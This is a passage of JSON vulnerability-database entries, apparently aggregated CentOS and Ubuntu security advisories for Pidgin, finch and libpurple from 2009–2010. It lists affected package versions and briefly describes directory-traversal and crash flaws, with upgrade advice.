"libpurple-2.6.5-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageName": "finch", "packageFilename": "finch-2.6.5-1.el4.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "any", "packageName": "pidgin", "packageFilename": "pidgin-2.6.5-1.el4.1.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "any", "packageName": "pidgin", "packageFilename": "pidgin-2.6.5-1.el4.1.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.5-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.6.5-1.el4.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.6.5-1.el4.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageName": "libpurple", "packageFilename": "libpurple-2.6.5-1.el4.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.5-1.el4.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.5-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.5-1.el4.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "any", "packageName": "pidgin", "packageFilename": "pidgin-2.6.5-1.el5.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "any", "packageName": "pidgin", "packageFilename": "pidgin-2.6.5-1.el5.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageName": "pidgin", "packageFilename": "pidgin-2.6.5-1.el4.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageName": "finch", "packageFilename": "finch-2.6.5-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.6.5-1.el4.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.6.5-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.6.5-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageName": "pidgin", "packageFilename": "pidgin-2.6.5-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.5-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "libpurple", "packageFilename": "libpurple-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "libpurple", "packageFilename": "libpurple-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.6.5-1.el4.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "pidgin", "packageFilename": "pidgin-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "pidgin", "packageFilename": "pidgin-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.6.5-1.el4.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.6.5-1.el4.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "finch", "packageFilename": "finch-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "finch", "packageFilename": "finch-2.6.5-1.el5.i386.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0044\n\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA directory traversal flaw was discovered in Pidgin's MSN protocol\nimplementation. A remote attacker could send a specially-crafted emoticon\nimage download request that would cause Pidgin to disclose an arbitrary\nfile readable to the user running Pidgin. (CVE-2010-0013)\n\nThese packages upgrade Pidgin to version 2.6.5. Refer to the Pidgin release\nnotes for a full list of changes: http://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which correct\nthis issue. Pidgin must be restarted for this update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/016447.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/016448.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/016465.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/016466.html\n\n**Affected packages:**\nfinch\nfinch-devel\nlibpurple\nlibpurple-devel\nlibpurple-perl\nlibpurple-tcl\npidgin\npidgin-devel\npidgin-perl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0044.html", "edition": 1, "reporter": "CentOS Project", "published": "2010-01-14T21:33:39", "title": "finch, libpurple, pidgin security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0013"], "modified": "2010-01-15T00:14:04", "href": "http://lists.centos.org/pipermail/centos-announce/2010-January/016447.html", "id": "CESA-2010:0044", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-10-03T18:25:07", "references": ["https://rhn.redhat.com/errata/RHSA-2010-0788.html", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "i386", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.6.6-5.el4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "x86_64", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.6-5.el5_5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "x86_64", "packageName": "finch", "packageFilename": "finch-2.6.6-5.el5_5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "x86_64", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.6.6-5.el4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "x86_64", "packageName": "libpurple", "packageFilename": "libpurple-2.6.6-5.el5_5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "x86_64", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.6.6-5.el5_5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "i386", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "x86_64", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.6-5.el5_5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "libpurple", "packageFilename": "libpurple-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "libpurple", "packageFilename": "libpurple-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "x86_64", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.6-5.el5_5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "i386", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.6.6-5.el4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "i386", "packageName": "libpurple", "packageFilename": "libpurple-2.6.6-5.el4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "x86_64", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el5_5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "x86_64", "packageName": "finch", "packageFilename": "finch-2.6.6-5.el4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "x86_64", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.6.6-5.el4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "i386", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.6-5.el4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "x86_64", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.6.6-5.el4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "i386", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.6.6-5.el4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "x86_64", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.6.6-5.el5_5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "x86_64", "packageName": "libpurple", "packageFilename": "libpurple-2.6.6-5.el4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "x86_64", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.6-5.el4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "i386", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.6-5.el4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "finch", "packageFilename": "finch-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "i386", "packageName": "finch", "packageFilename": "finch-2.6.6-5.el5_5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "x86_64", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.6.6-5.el5_5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "i386", "packageName": "finch", "packageFilename": "finch-2.6.6-5.el4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "any", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el5_5.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "arch": "any", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el5_5.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "x86_64", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.6-5.el4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "any", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el4.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "any", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el4.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "x86_64", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.6-5.el4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "i386", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.6-5.el4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-5.el4", "arch": "x86_64", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el4.x86_64.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0788\n\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nMultiple NULL pointer dereference flaws were found in the way Pidgin\nhandled Base64 decoding. A remote attacker could use these flaws to crash\nPidgin if the target Pidgin user was using the Yahoo! Messenger Protocol,\nMSN, MySpace, or Extensible Messaging and Presence Protocol (XMPP) protocol\nplug-ins, or using the Microsoft NT LAN Manager (NTLM) protocol for\nauthentication. (CVE-2010-3711)\n\nA NULL pointer dereference flaw was found in the way the Pidgin MSN\nprotocol plug-in processed custom emoticon messages. A remote attacker\ncould use this flaw to crash Pidgin by sending specially-crafted emoticon\nmessages during mutual communication. (CVE-2010-1624)\n\nRed Hat would like to thank the Pidgin project for reporting these issues.\nUpstream acknowledges Daniel Atallah as the original reporter of\nCVE-2010-3711, and Pierre Nogues of Meta Security as the original reporter\nof CVE-2010-1624.\n\nAll Pidgin users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017101.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017102.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017117.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017118.html\n\n**Affected packages:**\nfinch\nfinch-devel\nlibpurple\nlibpurple-devel\nlibpurple-perl\nlibpurple-tcl\npidgin\npidgin-devel\npidgin-perl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0788.html", "edition": 1, "reporter": "CentOS Project", "published": "2010-10-21T18:51:36", "title": "finch, libpurple, pidgin security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-1624", "CVE-2010-3711"], "modified": "2010-10-25T09:22:45", "href": "http://lists.centos.org/pipermail/centos-announce/2010-October/017101.html", "id": "CESA-2010:0788", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:08:43", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2010-0423", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-0420", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-0277"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "1:2.6.2-1ubuntu7.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "1:2.5.5-1ubuntu8.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.10", "packageVersion": "1:2.5.2-0ubuntu1.7", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "1:2.4.1-1ubuntu2.9", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}], "description": "Fabian Yamaguchi discovered that Pidgin incorrectly validated all fields of an incoming message in the MSN protocol handler. A remote attacker could send a specially crafted message and cause Pidgin to crash, leading to a denial of service. (CVE-2010-0277)\n\nSadrul Habib Chowdhury discovered that Pidgin incorrectly handled certain nicknames in Finch group chat rooms. A remote attacker could use a specially crafted nickname and cause Pidgin to crash, leading to a denial of service. (CVE-2010-0420)\n\nAntti Hayrynen discovered that Pidgin incorrectly handled large numbers of smileys. A remote attacker could send a specially crafted message and cause Pidgin to become unresponsive, leading to a denial of service. (CVE-2010-0423)", "edition": 3, "reporter": "Ubuntu", "published": "2010-02-22T00:00:00", "title": "Pidgin vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2010-02-22T00:00:00", "id": "USN-902-1", "href": "https://usn.ubuntu.com/902-1/", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:08:12", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3711", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-1624"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "1:2.6.2-1ubuntu7.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "1:2.4.1-1ubuntu2.10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "1:2.7.3-1ubuntu3.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "1:2.6.6-1ubuntu4.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}], "description": "Pierre Nogu\u00e8s discovered that Pidgin incorrectly handled malformed SLP messages in the MSN protocol handler. A remote attacker could send a specially crafted message and cause Pidgin to crash, leading to a denial of service. This issue only affected Ubuntu 8.04 LTS, 9.10 and 10.04 LTS. (CVE-2010-1624)\n\nDaniel Atallah discovered that Pidgin incorrectly handled the return code of the Base64 decoding function. A remote attacker could send a specially crafted message and cause Pidgin to crash, leading to a denial of service. (CVE-2010-3711)", "edition": 3, "reporter": "Ubuntu", "published": "2010-11-04T00:00:00", "title": "Pidgin vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-1624", "CVE-2010-3711"], "modified": "2010-11-04T00:00:00", "id": "USN-1014-1", "href": "https://usn.ubuntu.com/1014-1/", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:10:29", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2009-3085", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-2703", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-0013", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-3615", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-1376", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-2955", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-3083", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-3026"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "8.10", "packageVersion": "1:2.5.2-0ubuntu1.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "1:2.5.5-1ubuntu8.5", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "1:2.4.1-1ubuntu2.8", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "1:2.6.2-1ubuntu7.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}], "description": "It was discovered that Pidgin did not properly handle certain topic messages in the IRC protocol handler. If a user were tricked into connecting to a malicious IRC server, an attacker could cause Pidgin to crash, leading to a denial of service. This issue only affected Ubuntu 8.04 LTS, Ubuntu 8.10 and Ubuntu 9.04. (CVE-2009-2703)\n\nIt was discovered that Pidgin did not properly enforce the \u201crequire TLS/SSL\u201d setting when connecting to certain older Jabber servers. If a remote attacker were able to perform a man-in-the-middle attack, this flaw could be exploited to view sensitive information. This issue only affected Ubuntu 8.04 LTS, Ubuntu 8.10 and Ubuntu 9.04. (CVE-2009-3026)\n\nIt was discovered that Pidgin did not properly handle certain SLP invite messages in the MSN protocol handler. A remote attacker could send a specially crafted invite message and cause Pidgin to crash, leading to a denial of service. This issue only affected Ubuntu 8.04 LTS, Ubuntu 8.10 and Ubuntu 9.04. (CVE-2009-3083)\n\nIt was discovered that Pidgin did not properly handle certain errors in the XMPP protocol handler. A remote attacker could send a specially crafted message and cause Pidgin to crash, leading to a denial of service. This issue only affected Ubuntu 8.10 and Ubuntu 9.04. (CVE-2009-3085)\n\nIt was discovered that Pidgin did not properly handle malformed contact-list data in the OSCAR protocol handler. A remote attacker could send specially crafted contact-list data and cause Pidgin to crash, leading to a denial of service. (CVE-2009-3615)\n\nIt was discovered that Pidgin did not properly handle custom smiley requests in the MSN protocol handler. A remote attacker could send a specially crafted filename in a custom smiley request and obtain arbitrary files via directory traversal. This issue only affected Ubuntu 8.10, Ubuntu 9.04 and Ubuntu 9.10. (CVE-2010-0013)\n\nPidgin for Ubuntu 8.04 LTS was also updated to fix connection issues with the MSN protocol.\n\nUSN-675-1 and USN-781-1 provided updated Pidgin packages to fix multiple security vulnerabilities in Ubuntu 8.04 LTS. The security patches to fix CVE-2008-2955 and CVE-2009-1376 were incomplete. This update corrects the problem. Original advisory details:\n\nIt was discovered that Pidgin did not properly handle file transfers containing a long filename and special characters in the MSN protocol handler. A remote attacker could send a specially crafted filename in a file transfer request and cause Pidgin to crash, leading to a denial of service. (CVE-2008-2955)\n\nIt was discovered that Pidgin did not properly handle certain malformed messages in the MSN protocol handler. A remote attacker could send a specially crafted message and possibly execute arbitrary code with user privileges. (CVE-2009-1376)", "edition": 3, "reporter": "Ubuntu", "published": "2010-01-18T00:00:00", "title": "Pidgin vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-3085", "CVE-2009-3083", "CVE-2009-1376", "CVE-2009-3026", "CVE-2010-0013", "CVE-2009-2703", "CVE-2009-3615", "CVE-2008-2955"], "modified": "2010-01-18T00:00:00", "id": "USN-886-1", "href": "https://usn.ubuntu.com/886-1/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2018-08-31T02:36:37", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "2.6.6", "arch": "i486", "packageFilename": "pidgin-2.6.6-i486-1_slack13.0.txz", "packageName": "pidgin", "operator": "lt"}, {"OS": 